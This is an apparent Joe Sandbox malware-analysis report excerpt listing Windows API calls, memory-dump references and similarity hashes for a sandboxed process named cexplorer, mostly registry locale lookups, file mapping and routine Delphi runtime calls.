                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0355A34D,?,?), ref: 0355A1CC
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0355A1EA
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0355A208
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0355A226
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0355A244
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0355A330,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0355A34D), ref: 0355A284
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0355A330,?,80000001), ref: 0355A2AF
                                                                                                            • RegCloseKey.ADVAPI32(?,0355A337,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0355A330,?,80000001,Software\Embarcadero\Locales), ref: 0355A32A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open$QueryValue$CloseFileModuleName
                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                                            • API String ID: 2701450724-3496071916
                                                                                                            • Opcode ID: f9a43c4185e634ff887158bcdc827909b0a8bf8c2249e3ee604d4be9eafa9044
                                                                                                            • Instruction ID: 02a3a6aedc836782427d02b4822ab19aa1caeaeeb5d11a5d6c26b4e09c08ce9e
                                                                                                            • Opcode Fuzzy Hash: f9a43c4185e634ff887158bcdc827909b0a8bf8c2249e3ee604d4be9eafa9044
                                                                                                            • Instruction Fuzzy Hash: 8D518879A40309BEEB11DA94EC61FAEB7BCFB58704F550163BE14EA1A1D770BA40C650

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • SetForegroundWindow.USER32(?), ref: 035E695E
                                                                                                            • AllowSetForegroundWindow.USER32(000000FF), ref: 035E6968
                                                                                                            • GlobalAddAtomW.KERNEL32(00000000), ref: 035E69A5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ForegroundWindow$AllowAtomGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 4093426540-0
                                                                                                            • Opcode ID: b3d9d71e70c31f82685d9d812523df828c5e00c97f598600c5534f5a040eb0df
                                                                                                            • Instruction ID: a4225ff22575d1ea35960b76ffd497079457b0481da9fc85013e0c5f0a60f7e2
                                                                                                            • Opcode Fuzzy Hash: b3d9d71e70c31f82685d9d812523df828c5e00c97f598600c5534f5a040eb0df
                                                                                                            • Instruction Fuzzy Hash: EC617F75A04309EFCB14EFA4E89099E77F9FB98350F5148A6F818D7260E734EA40CB20

                                                                                                            Control-flow Graph

APIs
• CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER},?,?,035F0803,00000001), ref: 035E9BC1
• GetLastError.KERNEL32(000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER},?,?,035F0803,00000001), ref: 035E9BE6
• MapViewOfFile.KERNEL32(000004EC,00000006,00000000,00000000,00000028,?,000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER},?,?,035F0803,00000001), ref: 035E9C04
• UnmapViewOfFile.KERNEL32(033C0000,?,?,035F0803,00000001), ref: 035E9C51
• CloseHandle.KERNEL32(000004EC,?,?,035F0803,00000001), ref: 035E9C68
Strings
• {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}, xrefs: 035E9BB2
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: File$View$CloseCreateErrorHandleLastMappingUnmap
• String ID: {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}
• API String ID: 3716401421-4124573863

Control-flow Graph

APIs
• GetCurrentThreadId.KERNEL32 ref: 03556E7F
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0

Control-flow Graph

APIs
• GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,0356C860), ref: 0356C7A5
• GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,0356C843,?,00000000,?,00000000,0356C860), ref: 0356C7DE
• VerQueryValueW.VERSION(?,0356C874,?,?,00000000,?,00000000,?,00000000,0356C843,?,00000000,?,00000000,0356C860), ref: 0356C7F8
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: FileInfoVersion$QuerySizeValue
• String ID:
• API String ID: 2179348866-0

Control-flow Graph

APIs
• CallNextHookEx.USER32(00000000,?,?,?), ref: 035E98A8
• PostMessageW.USER32(?,?,?,?), ref: 035E98D7
• CallNextHookEx.USER32(?,?,?,?), ref: 035E98F3
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: CallHookNext$MessagePost
• String ID:
• API String ID: 1364302874-0

Control-flow Graph

APIs
• GetUserDefaultUILanguage.KERNEL32(00000000,0355A81F,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0355A8A6,00000000,?,00000105), ref: 0355A7B3
• GetSystemDefaultUILanguage.KERNEL32(00000000,0355A81F,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0355A8A6,00000000,?,00000105), ref: 0355A7DB
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: DefaultLanguage$SystemUser
• String ID:
• API String ID: 384301227-0

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0355A8E6,?,?,00000000), ref: 0355A868
• LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0355A8E6,?,?,00000000), ref: 0355A8B9
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: FileLibraryLoadModuleName
• String ID:
• API String ID: 1159719554-0

Control-flow Graph

APIs
• VirtualFree.KERNEL32(035F4A5C,00000000,00008000), ref: 03554EC6
• VirtualFree.KERNEL32(035F6B00,00000000,00008000), ref: 03554F42
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: 85d265cb1c9bc1ae4947369478cf1b000f2f4e11f898492c06985d83243b633f
                                                                                                            • Instruction ID: 02db558ece5aef5c67616e59e227d9d055bf5d53c7aaa5759ac1bcd9228c3f6b
                                                                                                            • Opcode Fuzzy Hash: 85d265cb1c9bc1ae4947369478cf1b000f2f4e11f898492c06985d83243b633f
                                                                                                            • Instruction Fuzzy Hash: 8211BFB17006009FD764CF5AB855B26BAE5FB88710F1589AEFA4DDF360D730E8418B98

Control-flow Graph
APIs
• CreateWindowExW.USER32(000000A0,00000000,?,00000000,00000000,035E6FA7,?,00000000,035E7016,?,?,?), ref: 0355C43F
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 993b40372ded986758e10d910bcff418d912927c9da50b718accd923f3091136
• Instruction ID: 77ab7ab277c03c1d909bb8974a4a6c9116e590031e0f6d3198c4cc129646b1ba
• Opcode Fuzzy Hash: 993b40372ded986758e10d910bcff418d912927c9da50b718accd923f3091136
• Instruction Fuzzy Hash: D1F097B6604219BF8B44DE9DDC80DDF77ECEB8D2A0B054525FA0CE7210D634ED1087A0

Control-flow Graph
APIs
• GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 035595D2
  • Part of subcall function 0355A82C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0355A8E6,?,?,00000000), ref: 0355A868
  • Part of subcall function 0355A82C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0355A8E6,?,?,00000000), ref: 0355A8B9
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: FileModuleName$LibraryLoad
• String ID:
• API String ID: 4113206344-0
• Opcode ID: 3fa9d78bf1d1d9bcf32d207f293726de594c7b481e3e9540a8b4e3ecdafb39e2
• Instruction ID: 9d89ae8f1253d37648fc122c1160223827aef076cf05e4c19bbdab2e9b01aa5b
• Opcode Fuzzy Hash: 3fa9d78bf1d1d9bcf32d207f293726de594c7b481e3e9540a8b4e3ecdafb39e2
• Instruction Fuzzy Hash: 0BE0EDB5A003109BCB10DFA8D8D4A5677E8BF48754F044A96BD18CF256E775E920C7D1

Control-flow Graph
APIs
  • Part of subcall function 0355B1A0: TlsGetValue.KERNEL32(0000002D), ref: 0355B1B8
  • Part of subcall function 0355B1A0: LocalFree.KERNEL32(00000000,0000002D), ref: 0355B1C2
  • Part of subcall function 0355B1A0: TlsSetValue.KERNEL32(0000002D,00000000,00000000,0000002D), ref: 0355B1CF
• TlsFree.KERNEL32(0000002D), ref: 0355B1F5
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: FreeValue$Local
• String ID:
• API String ID: 2930853931-0
• Opcode ID: 11a443838712413e84e8968375c045c19d8bb7a7e8feb8971ad745f79d018a5a
• Instruction ID: d80ff48e3bc7fa1a14590dd590c1e51758c16bc1d46116efbcca01029f899255
• Opcode Fuzzy Hash: 11a443838712413e84e8968375c045c19d8bb7a7e8feb8971ad745f79d018a5a
• Instruction Fuzzy Hash: CEC0123C1007418DD660E179E82C6102274BB40321F444252B922C61F0D928A0469B21
APIs
• VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,03553DCF), ref: 035537CF
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: ab7bd52f04c64cda0bf86f356c249f500864db76f484cd8e870c843431f2ad66
• Instruction ID: 2f927c1c1427e61513948bdd165ffbb07016a2d0fec14777ae459dd7110e192f
• Opcode Fuzzy Hash: ab7bd52f04c64cda0bf86f356c249f500864db76f484cd8e870c843431f2ad66
• Instruction Fuzzy Hash: EBF0DCF2B043014FD714EFB8AA41B02BBE2F744340F00063EED89DB6A8E77088068784
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,03563088,?,?), ref: 03559F55
• GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 03559F66
• FindFirstFileW.KERNEL32(?,?,kernel32.dll,03563088,?,?), ref: 0355A066
• FindClose.KERNEL32(?,?,?,kernel32.dll,03563088,?,?), ref: 0355A078
• lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,03563088,?,?), ref: 0355A084
• lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,03563088,?,?), ref: 0355A0C9
Strings
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
• String ID: GetLongPathNameW$\$kernel32.dll
• API String ID: 1930782624-3908791685
• Opcode ID: 57c348ebb66741694d29f5a05ddf9f43e168b69c2b83defd34415662921e6a76
• Instruction ID: 712b0ab26f0f07e5da5190062a63d0080ab01aa3a118532257713ad8c087956b
• Opcode Fuzzy Hash: 57c348ebb66741694d29f5a05ddf9f43e168b69c2b83defd34415662921e6a76
• Instruction Fuzzy Hash: 74419636E0061ADBCB11DA94DC94ADEB3B5BF84310F1885A6AD08E7270E778BE44DB45
APIs
• IsValidLocale.KERNEL32(?,00000002,00000000,03559C41,?,03563088,?,00000000), ref: 03559B86
• GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,03559C41,?,03563088,?,00000000), ref: 03559BA2
• GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,03559C41,?,03563088,?,00000000), ref: 03559BB3
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: Locale$Info$Valid
• String ID:
• API String ID: 1826331170-0
• Opcode ID: 5651bd08e9f8d1c1dc5bbc6736eb1172950e0ef2913da4fcda5c6fc199421260
• Instruction ID: 520236c170a3a245d40d80bfc49f53db85672ba11d9ade6307d0d395648a2153
• Opcode Fuzzy Hash: 5651bd08e9f8d1c1dc5bbc6736eb1172950e0ef2913da4fcda5c6fc199421260
• Instruction Fuzzy Hash: 17319335A04708EEEF20DB54ECA0BDEB7B9FB48711F400196B909A7274D7397E80CA11
                                                                                                            APIs
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 03566FF5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DiskFreeSpace
                                                                                                            • String ID:
                                                                                                            • API String ID: 1705453755-0
                                                                                                            • Opcode ID: d1a421e78e76d8e9275bf7b6749d2d5875c0d122cd6039931ec288c866d8c84f
                                                                                                            • Instruction ID: 292642b0a876aefee4dacdb696a3b1d6af90951553c7dec2a6ddbadae74364ac
                                                                                                            • Opcode Fuzzy Hash: d1a421e78e76d8e9275bf7b6749d2d5875c0d122cd6039931ec288c866d8c84f
                                                                                                            • Instruction Fuzzy Hash: D511D2B5E00209AFDB04CF99DC81DAFF7F9FFC8310B54C559A505EB254E631AA018B90
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0356A91A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: bf9eddbab0c2fef7672b8472f2d2fd637454bb0f8b1daf1517a1e2d8766482e9
                                                                                                            • Instruction ID: 2d022383effea14c5e1ba0f9b254559a7c2173088f540ba740ca01ab1c05e9b3
                                                                                                            • Opcode Fuzzy Hash: bf9eddbab0c2fef7672b8472f2d2fd637454bb0f8b1daf1517a1e2d8766482e9
                                                                                                            • Instruction Fuzzy Hash: 3AE0D87570031417D310E958AC95AF6727DB78D600F4041BBBD09DB352EDA0ED4046E4
                                                                                                            APIs
                                                                                                            • GetVersionExW.KERNEL32(?), ref: 035E737F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
